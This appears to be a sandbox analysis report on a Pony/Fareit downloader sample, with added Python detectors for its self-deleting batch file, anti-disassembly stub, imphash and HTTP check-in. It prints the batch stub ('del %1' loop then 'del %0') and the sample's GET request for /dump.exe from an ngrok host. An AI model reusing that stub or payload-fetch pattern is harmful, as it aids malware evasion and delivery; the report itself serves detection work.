3.13.191.225 | 5mYTdqqvw1.exe | malicious
3.13.191.225 | 9bYxuF9KrT.exe | malicious
3.13.191.225 | JuMh4hUanr.exe | malicious
3.13.191.225 | MXfPzdKLDO.exe | malicious
3.13.191.225 | 2TEKb7PdvN.exe | malicious
3.13.191.225 | xKeHI0tf38.exe | malicious
3.13.191.225 | AsyncClient - Copy.exe | malicious
3.13.191.225 | H9cWKER9Ca.exe | malicious
3.13.191.225 | QL8LP18ukM.exe | malicious
3.13.191.225 | pqa0cpFF0r.exe | malicious
3.13.191.225 | Bx757nPqML.exe | malicious
3.13.191.225 | 0YeDphMbMa.exe | malicious
3.13.191.225 | F5SaKVp0.exe | malicious
3.13.191.225 | yWETxQps.exe | malicious
3.13.191.225 | VryE7Rq2.exe | malicious
3.13.191.225 | 4ubvZ6GdWv.exe | malicious
3.13.191.225 | SecuriteInfo.com.Trojan.DownLoader34.18436.32216.exe | malicious

                                                                  Domains

                                                                  No context

                                                                  ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
AMAZON-02 (US) | o2.exe | malicious | 18.188.109.70
AMAZON-02 (US) | Meetup_LogiCameraSettings_2.5.17.exe | malicious | 52.94.28.172
AMAZON-02 (US) | mar2403.xlsx | malicious | 54.180.158.181
AMAZON-02 (US) | Invoice.xlsx | malicious | 54.180.158.181
AMAZON-02 (US) | Revised Signed Proforma Invoice 000856453553.exe | malicious | 3.131.252.17
AMAZON-02 (US) | Q lifesettlements INVOICE.htm | malicious | 15.237.76.117
AMAZON-02 (US) | NEW ORDER 3742.exe | malicious | 13.55.94.210
AMAZON-02 (US) | 7Q5Er1TObp.exe | malicious | 44.227.65.245
AMAZON-02 (US) | 4d86320858effdc2c8bf3fc2ae86080f0f6b449141991.dll | malicious | 143.204.3.74
AMAZON-02 (US) | Bs04AQyK2o.exe | malicious | 18.219.49.238
AMAZON-02 (US) | yZEqL0ovOF.dll | malicious | 143.204.3.74
AMAZON-02 (US) | SecuriteInfo.com.Variant.Razy.854842.26563.exe | malicious | 35.162.32.82
AMAZON-02 (US) | BraveBrowserSetup.exe | malicious | 143.204.209.32
AMAZON-02 (US) | Feb SOA.xlsx | malicious | 18.158.19.118
AMAZON-02 (US) | Tl36BaDp7L.dll | malicious | 52.84.51.72
AMAZON-02 (US) | x2I11QaLmb.dll | malicious | 52.84.51.72
AMAZON-02 (US) | 44279.8611321759.dll | malicious | 52.84.51.72
AMAZON-02 (US) | 44279.8611321859.dll | malicious | 52.84.51.72
AMAZON-02 (US) | 9wRKBsPvUT.dll | malicious | 13.226.135.72
AMAZON-02 (US) | nIXvr6hak8.dll | malicious | 13.226.135.72

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\4066921.bat
                                                                  Process:C:\Users\user\Desktop\eQDy6dGVwQ.exe
                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                  Category:dropped
                                                                  Size (bytes):94
                                                                  Entropy (8bit):3.233204299824007
                                                                  Encrypted:false
                                                                  SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                                                                  MD5:3880EEB1C736D853EB13B44898B718AB
                                                                  SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                                                                  SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                                                                  SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview: ......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0
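
The dropped batch file is the self-deletion stub from the leaked Pony Loader source: a label, `del %1` on the path passed as the first argument, a loop that keeps trying while the file still exists (the dropper process may not have exited yet), then `del %0` to remove the script itself. The check below is an added example, not Joe Sandbox or Pony code. The batch text is reconstructed from the preview above (the dots there are non-printable bytes), the launch command line is copied from the System Behavior section of this report (Joe Sandbox renders double quotes as single quotes, so the parser normalises both), and the benign comparison script is constructed.

```python
import re

# Reconstructed from the 4066921.bat preview above (non-printables shown as
# dots there); the file uses CRLF line endings, which splitlines() handles.
PONY_BAT = ":ktk\r\ndel %1\r\nif exist %1 goto ktk\r\ndel %0\r\n"

# Constructed benign cleanup script: also deletes files, but not this pattern.
BENIGN_BAT = "@echo off\r\ndel /q %TEMP%\\build\\*.obj\r\necho done\r\n"

# Launch command line copied from the System Behavior section of this report.
REPORT_CMDLINE = (r"C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local"
                  r"\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '")

LABEL    = re.compile(r"^:(\w+)$")
DEL_ARG  = re.compile(r"^del\s+%1$", re.I)
LOOP     = re.compile(r"^if\s+exist\s+%1\s+goto\s+(\w+)$", re.I)
SELF_DEL = re.compile(r"^del\s+%0$", re.I)


def is_pony_self_delete(script: str) -> bool:
    """True if the script deletes its first argument in a loop that spins
    until the file is gone, then deletes itself.  Order matters: the goto
    must target the label that precedes 'del %1', and 'del %0' must come
    after the loop, otherwise this is not the Pony stub."""
    label, stage = None, 0        # stage 1: saw del %1, stage 2: saw the loop
    for line in (ln.strip() for ln in script.splitlines()):
        if not line:
            continue
        if (m := LABEL.match(line)):
            label, stage = m.group(1).lower(), 0
        elif label and DEL_ARG.match(line):
            stage = 1
        elif stage == 1 and (m := LOOP.match(line)) and m.group(1).lower() == label:
            stage = 2
        elif stage == 2 and SELF_DEL.match(line):
            return True
    return False


def parse_self_delete_cmdline(cmdline: str):
    """Pull (batch path, executable handed to it as %1) out of the cmd.exe
    launch.  Joe Sandbox prints the real double quotes as single quotes, so
    both are normalised first.  Returns None for command lines that do not
    fit the '<Temp>\\<digits>.bat <exe>' shape."""
    norm = cmdline.replace("'", '"')
    m = re.search(r'cmd(?:\.exe)?\s+/c\s+"+([^"]+\\Temp\\\d+\.bat)"\s+"([^"]+\.exe)"',
                  norm, re.I)
    return (m.group(1), m.group(2)) if m else None


def triage(script: str, cmdline: str) -> dict:
    """Combine both observables: the script pattern and the fact that it was
    launched with the dropper's own path as %1."""
    parsed = parse_self_delete_cmdline(cmdline)
    return {
        "script_matches": is_pony_self_delete(script),
        "batch": parsed[0] if parsed else None,
        "deletes": parsed[1] if parsed else None,
    }
```

The file is gone by the time a responder looks, so the durable artefacts are the cmd.exe command line (a numeric `.bat` under `%TEMP%` receiving the parent executable's path) and, where command-line logging is on, the `del %0` pattern itself.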

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.198137158347105
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.56%
                                                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  File name:eQDy6dGVwQ.exe
                                                                  File size:92672
                                                                  MD5:eb2fbc15dfb24af75c431b7525fed6e7
                                                                  SHA1:f060052cf7ee32a7aa2fa17f9f749880b70ffff3
                                                                  SHA256:5ee70bdf6cfa9c2742889a7c724fa6940e40c64d6ab420303ea6e031ae3d6ce4
                                                                  SHA512:b7026378df14d900c7d2e43ed9a2eda12aeedf506f80936effb7bd505da6b138cc230c220092d7e7693f63d328f6575622c056487f45221839cab20df03f40f3
                                                                  SSDEEP:1536:UnSncgyGqTDRXmGcwSCfZDalZNg9tvo0iO3AX4ApTvMEIakzmt2l:2SnMuGc/CfZDap6COU45EIitm
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......U...............2.....R......!........0....@........................................................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x410621
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x55FD15FA [Sat Sep 19 07:59:54 2015 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:09070e021d4505e6183701ac6e022a16

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  pop ebp
                                                                  push 0041062Fh
                                                                  clc
                                                                  jc 00007FD5389A5693h
                                                                  ret
                                                                  jmp far eax
                                                                  push esp
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [ecx+0000000Ah], bh
                                                                  xor edx, edx
                                                                  div ecx
                                                                  cmp edx, 05h
                                                                  jne 00007FD5389A5694h
                                                                  jmp 00007FD5389A5694h
                                                                  jmp 00007FD5389A567Bh
                                                                  call 00007FD5389A560Dh
                                                                  push 00000000h
                                                                  call 00007FD5389A57C1h
                                                                  jmp dword ptr [00418148h]
                                                                  jmp dword ptr [0041814Ch]
                                                                  jmp dword ptr [00418150h]
                                                                  jmp dword ptr [00418154h]
                                                                  jmp dword ptr [00418158h]
                                                                  jmp dword ptr [0041815Ch]
                                                                  jmp dword ptr [00418160h]
                                                                  jmp dword ptr [00418164h]
                                                                  jmp dword ptr [00418168h]
                                                                  jmp dword ptr [0041816Ch]
                                                                  jmp dword ptr [00418170h]
                                                                  jmp dword ptr [00418174h]
                                                                  jmp dword ptr [00418178h]
                                                                  jmp dword ptr [0041817Ch]
                                                                  jmp dword ptr [00418180h]
                                                                  jmp dword ptr [00418184h]
                                                                  jmp dword ptr [00418188h]
                                                                  jmp dword ptr [0041818Ch]
                                                                  jmp dword ptr [00418190h]
                                                                  jmp dword ptr [00418194h]
                                                                  jmp dword ptr [00418198h]
                                                                  jmp dword ptr [0041819Ch]
                                                                  jmp dword ptr [004181A0h]
                                                                  jmp dword ptr [004181A4h]
                                                                  jmp dword ptr [004181A8h]
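
The first instructions of the listing above are an anti-disassembly stub, not a normal prologue. `push 0041062Fh` followed by `ret` transfers control to 0x41062F; the `clc`/`jc` pair in between is an opaque predicate (carry is cleared, so the jump is never taken), and one junk byte after the `ret` is what makes the linear listing decode `jmp far eax`, `push esp`, `add byte ptr [eax], al` before it resynchronises. The script below is an added example, not Joe Sandbox output. It walks the stub as copied from the report using the standard x86 encoding lengths for these instructions (assuming the short `jc rel8` form) and reports the real target and the junk byte count.

```python
import re

ENTRYPOINT = 0x410621   # "Entrypoint" from Static PE Info above

# First seven instructions of the Entrypoint Preview, verbatim from the report.
STUB = [
    "push ebp",
    "mov ebp, esp",
    "pop ebp",
    "push 0041062Fh",
    "clc",
    "jc 00007FD5389A5693h",   # sandbox-rebased target; never taken after clc
    "ret",
]

# Encoded lengths, assumed from the standard x86 forms of these instructions:
# 55 / 8B EC / 5D / 68 imm32 / F8 / 72 rel8 / C3.
LENGTHS = {"push ebp": 1, "mov ebp, esp": 2, "pop ebp": 1,
           "push imm32": 5, "clc": 1, "jc rel8": 2, "ret": 1}

PUSH_IMM = re.compile(r"^push\s+([0-9A-Fa-f]+)h$")


def insn_length(insn: str) -> int:
    if PUSH_IMM.match(insn):
        return LENGTHS["push imm32"]
    if insn.startswith("jc "):
        return LENGTHS["jc rel8"]
    return LENGTHS[insn]


def analyse_stub(listing, entry=ENTRYPOINT):
    """Linear walk of the stub.  Returns None for an ordinary prologue, or:
      target  - address the final `ret` really transfers to (the pushed imm32)
      ret_at  - address of that `ret`
      opaque  - True if a `clc`/`jc` pair sits between push and ret: carry is
                cleared, so the conditional jump is an opaque predicate
      junk    - bytes between the end of `ret` and the target; a linear
                disassembler decodes them as code and desynchronises"""
    addr, pending, opaque, prev = entry, None, False, None
    for insn in listing:
        m = PUSH_IMM.match(insn)
        if m:
            pending = int(m.group(1), 16)
        elif insn.startswith(("push ", "pop ")):
            pending = None            # stack changed; a later ret pops something else
        elif insn.startswith("jc ") and prev == "clc":
            opaque = True
        elif insn == "ret":
            if pending is None:
                return None
            end_of_ret = addr + insn_length("ret")
            return {"target": pending, "ret_at": addr,
                    "opaque": opaque, "junk": pending - end_of_ret}
        addr += insn_length(insn)
        prev = insn
    return None
```

When loading the sample into a disassembler, define code at 0x41062F by hand (or mark the byte at 0x41062E as data); the remaining listing above, the run of `jmp dword ptr [004181xxh]` thunks, is the ordinary import jump table and is not affected.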

                                                                  Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17ef0 | 0xc8 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                  Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11a4b | 0x11c00 | False | 0.460566131162 | data | 6.06293067263 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x13000 | 0x100 | 0x200 | False | 0.392578125 | data | 3.04800455669 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x4ea8 | 0x4a00 | False | 0.403769003378 | data | 5.19839782997 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                  Imports

DLL | Import
KERNEL32.DLL | CreateFileA, ReadFile, CloseHandle, WriteFile, lstrlenA, GlobalLock, GlobalUnlock, LocalFree, LocalAlloc, GetTickCount, lstrcpyA, lstrcatA, GetFileAttributesA, ExpandEnvironmentStringsA, GetFileSize, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, LoadLibraryA, GetProcAddress, GetTempPathA, CreateDirectoryA, DeleteFileA, GetCurrentProcess, WideCharToMultiByte, GetLastError, lstrcmpA, CreateToolhelp32Snapshot, Process32First, OpenProcess, Process32Next, FindFirstFileA, lstrcmpiA, FindNextFileA, FindClose, GetModuleHandleA, GetVersionExA, GetLocaleInfoA, GetSystemInfo, GetWindowsDirectoryA, GetPrivateProfileStringA, SetCurrentDirectoryA, GetPrivateProfileSectionNamesA, GetPrivateProfileIntA, GetCurrentDirectoryA, lstrlenW, MultiByteToWideChar, Sleep, GetModuleFileNameA, LCMapStringA, ExitProcess, SetUnhandledExceptionFilter
advapi32.dll | RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyA, RegEnumKeyExA, RegCreateKeyA, RegSetValueExA, IsTextUnicode, RegOpenCurrentUser, RegEnumValueA, GetUserNameA
ole32.dll | CreateStreamOnHGlobal, GetHGlobalFromStream, CoCreateGuid, CoTaskMemFree, CoCreateInstance, OleInitialize
shell32.dll | ShellExecuteA
shlwapi.dll | StrStrIA, StrRChrIA, StrToIntA, StrStrA, StrCmpNIA, StrStrIW
user32.dll | wsprintfA
userenv.dll | LoadUserProfileA, UnloadUserProfile
wininet.dll | InternetCrackUrlA, InternetCreateUrlA
wsock32.dll | inet_addr, gethostbyname, socket, connect, closesocket, send, select, recv, setsockopt, WSAStartup
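
The Import Hash in Static PE Info (09070e021d4505e6183701ac6e022a16) is the value most useful for clustering Pony builds, since the import table survives repacking of the configuration far better than the file hash does. The script below is an added example, not Joe Sandbox code: it recomputes an imphash with the pefile/Mandiant convention from the import table as printed above, so the reader can see exactly what the hash covers. Whether the report lists DLLs and functions in their on-disk order is an assumption; the hash is order-sensitive, so a mismatch against the reported value means the listing was re-sorted, not that either hash is wrong.

```python
import hashlib

REPORTED_IMPHASH = "09070e021d4505e6183701ac6e022a16"   # Static PE Info above

# (DLL, imported functions) copied from the Imports table of this report,
# in the order printed there.
REPORT_IMPORTS = [
    ("KERNEL32.DLL", "CreateFileA, ReadFile, CloseHandle, WriteFile, lstrlenA, GlobalLock, GlobalUnlock, LocalFree, LocalAlloc, GetTickCount, lstrcpyA, lstrcatA, GetFileAttributesA, ExpandEnvironmentStringsA, GetFileSize, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, LoadLibraryA, GetProcAddress, GetTempPathA, CreateDirectoryA, DeleteFileA, GetCurrentProcess, WideCharToMultiByte, GetLastError, lstrcmpA, CreateToolhelp32Snapshot, Process32First, OpenProcess, Process32Next, FindFirstFileA, lstrcmpiA, FindNextFileA, FindClose, GetModuleHandleA, GetVersionExA, GetLocaleInfoA, GetSystemInfo, GetWindowsDirectoryA, GetPrivateProfileStringA, SetCurrentDirectoryA, GetPrivateProfileSectionNamesA, GetPrivateProfileIntA, GetCurrentDirectoryA, lstrlenW, MultiByteToWideChar, Sleep, GetModuleFileNameA, LCMapStringA, ExitProcess, SetUnhandledExceptionFilter"),
    ("advapi32.dll", "RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyA, RegEnumKeyExA, RegCreateKeyA, RegSetValueExA, IsTextUnicode, RegOpenCurrentUser, RegEnumValueA, GetUserNameA"),
    ("ole32.dll", "CreateStreamOnHGlobal, GetHGlobalFromStream, CoCreateGuid, CoTaskMemFree, CoCreateInstance, OleInitialize"),
    ("shell32.dll", "ShellExecuteA"),
    ("shlwapi.dll", "StrStrIA, StrRChrIA, StrToIntA, StrStrA, StrCmpNIA, StrStrIW"),
    ("user32.dll", "wsprintfA"),
    ("userenv.dll", "LoadUserProfileA, UnloadUserProfile"),
    ("wininet.dll", "InternetCrackUrlA, InternetCreateUrlA"),
    ("wsock32.dll", "inet_addr, gethostbyname, socket, connect, closesocket, send, select, recv, setsockopt, WSAStartup"),
]


def imphash(imports) -> str:
    """pefile/Mandiant imphash: '<dll minus .dll/.ocx/.sys>.<function>',
    lower-cased, one entry per import in table order, comma-joined, MD5.
    Imports by ordinal (none in this sample) would first need pefile's
    ordinal-to-name tables; they are not handled here."""
    entries = []
    for dll, funcs in imports:
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[:-len(ext)]
                break
        entries += [f"{lib}.{fn.strip().lower()}"
                    for fn in funcs.split(",") if fn.strip()]
    return hashlib.md5(",".join(entries).encode("ascii")).hexdigest()


def report_order_preserved(imports=REPORT_IMPORTS, reported=REPORTED_IMPHASH) -> bool:
    """True only if hashing the listing as printed reproduces the reported
    imphash, i.e. the report preserved the on-disk import order."""
    return imphash(imports) == reported
```

Run against the real file with pefile (`pefile.PE(path).get_imphash()`) to get the authoritative value; the point of the hand-rolled version is to make visible that case, extension stripping and order all feed the hash, which is why two reports that sort imports differently cannot be compared by imphash.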

                                                                  Network Behavior

                                                                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/25/21-16:34:00.175423 | TCP | 2014562 | ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 | 49725 | 80 | 192.168.2.4 | 3.13.191.225
03/25/21-16:34:00.175423 | TCP | 2014234 | ET TROJAN Fareit/Pony Downloader Checkin 3 | 49725 | 80 | 192.168.2.4 | 3.13.191.225

                                                                  Network Port Distribution

                                                                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 25, 2021 16:34:00.063608885 CET | 49725 | 80 | 192.168.2.4 | 3.13.191.225
Mar 25, 2021 16:34:00.175158978 CET | 80 | 49725 | 3.13.191.225 | 192.168.2.4
Mar 25, 2021 16:34:00.175260067 CET | 49725 | 80 | 192.168.2.4 | 3.13.191.225
Mar 25, 2021 16:34:00.175422907 CET | 49725 | 80 | 192.168.2.4 | 3.13.191.225
Mar 25, 2021 16:34:00.287456989 CET | 80 | 49725 | 3.13.191.225 | 192.168.2.4
Mar 25, 2021 16:34:00.287486076 CET | 80 | 49725 | 3.13.191.225 | 192.168.2.4
Mar 25, 2021 16:34:00.287513018 CET | 80 | 49725 | 3.13.191.225 | 192.168.2.4
Mar 25, 2021 16:34:00.287604094 CET | 49725 | 80 | 192.168.2.4 | 3.13.191.225
Mar 25, 2021 16:34:00.299055099 CET | 49725 | 80 | 192.168.2.4 | 3.13.191.225
Mar 25, 2021 16:34:00.410496950 CET | 80 | 49725 | 3.13.191.225 | 192.168.2.4

                                                                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 25, 2021 16:33:51.450567961 CET | 64646 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:51.463440895 CET | 53 | 64646 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:52.086076021 CET | 65298 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:52.099673033 CET | 53 | 65298 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:53.203974009 CET | 59123 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:53.216629982 CET | 53 | 59123 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:54.019910097 CET | 54531 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:54.032440901 CET | 53 | 54531 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:54.153573990 CET | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:54.171786070 CET | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:54.839554071 CET | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:54.854991913 CET | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:55.856831074 CET | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:55.869482040 CET | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:56.950942993 CET | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:56.963669062 CET | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:58.021019936 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:58.033957958 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:33:58.763385057 CET | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:33:58.776705980 CET | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:34:00.042227030 CET | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:34:00.057259083 CET | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:34:01.174869061 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:34:01.187585115 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:34:03.351310015 CET | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:34:03.364630938 CET | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:34:04.252389908 CET | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:34:04.264379978 CET | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:34:04.941294909 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:34:04.953236103 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Mar 25, 2021 16:34:05.860275030 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Mar 25, 2021 16:34:05.872997999 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4

                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 25, 2021 16:34:00.042227030 CET | 192.168.2.4 | 8.8.8.8 | 0x483d | Standard query (0) | 63e2e5290bcf.ngrok.io | A (IP address) | IN (0x0001)

                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 25, 2021 16:34:00.057259083 CET | 8.8.8.8 | 192.168.2.4 | 0x483d | No error (0) | 63e2e5290bcf.ngrok.io | | 3.13.191.225 | A (IP address) | IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • 63e2e5290bcf.ngrok.io

                                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49725 | 3.13.191.225 | 80 | C:\Users\user\Desktop\eQDy6dGVwQ.exe

Timestamp | kBytes transferred | Direction | Data
Mar 25, 2021 16:34:00.175422907 CET | 839 | OUT | GET /dump.exe HTTP/1.0
Host: 63e2e5290bcf.ngrok.io
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Mar 25, 2021 16:34:00.287486076 CET | 908 | IN | HTTP/1.0 404 Not Found
Connection: close
Content-Type: text/plain
Date: Thu, 25 Mar 2021 15:34:00 GMT
Content-Length: 38
Data Raw: 54 75 6e 6e 65 6c 20 36 33 65 32 65 35 32 39 30 62 63 66 2e 6e 67 72 6f 6b 2e 69 6f 20 6e 6f 74 20 66 6f 75 6e 64
Data Ascii: Tunnel 63e2e5290bcf.ngrok.io not found
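
Both Snort alerts carry the timestamp of this single request, and the traits they key on are all visible in the raw request: HTTP/1.0, `Accept-Encoding: identity, *;q=0`, and the fixed User-Agent `Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)` that Pony's HTTP library sends regardless of the real host (the sandbox is a 64-bit Windows machine running the sample under WOW64, not Windows 98). The detector below is an added example, not an Emerging Threats rule or Joe Sandbox code; the first request is copied from the report, the second is a constructed browser request for comparison.

```python
PONY_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"

# Request copied from the HTTP Packets section above.
PONY_REQUEST = (
    "GET /dump.exe HTTP/1.0\r\n"
    "Host: 63e2e5290bcf.ngrok.io\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    "\r\n"
)

# Constructed ordinary browser request for comparison.
BROWSER_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/87.0\r\n"
    "Accept: text/html\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.x request parser: request line plus a lower-cased
    header map (a repeated header keeps its last value)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def pony_indicators(raw: str) -> list:
    """Name every Pony-shaped trait present.  The UA string is the strong
    signal (the one ET SID 2014562's message refers to); the others are weak
    traits that raise confidence, or still fire if a build changes the UA."""
    req = parse_request(raw)
    h = req["headers"]
    hits = []
    if h.get("user-agent") == PONY_UA:
        hits.append("ua:msie5-win98")
    if req["version"] == "HTTP/1.0":
        hits.append("version:http/1.0")
    if h.get("accept-encoding", "").replace(" ", "") == "identity,*;q=0":
        hits.append("accept-encoding:identity-only")
    if h.get("host", "").endswith(".ngrok.io"):
        hits.append("host:ngrok-tunnel")
    if req["path"].lower().endswith(".exe"):
        hits.append("path:exe-download")
    return hits


def is_pony_http(raw: str) -> bool:
    """Alert on the fixed UA alone, or on three or more of the weak traits
    when the UA has been altered."""
    hits = pony_indicators(raw)
    weak = [x for x in hits if x != "ua:msie5-win98"]
    return "ua:msie5-win98" in hits or len(weak) >= 3
```

The 404 body (`Tunnel 63e2e5290bcf.ngrok.io not found`) shows the ngrok tunnel was already torn down when the sample was detonated, and random ngrok subdomains are short-lived, so the Host value is a poor long-term indicator; the User-Agent and header shape are what to pivot on, together with the 3.13.191.225 context above (shared ngrok egress, hence many unrelated samples).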


                                                                  Code Manipulations


                                                                  System Behavior

                                                                  General

                                                                  Start time:16:33:58
                                                                  Start date:25/03/2021
                                                                  Path:C:\Users\user\Desktop\eQDy6dGVwQ.exe
                                                                  Wow64 process (32bit):true
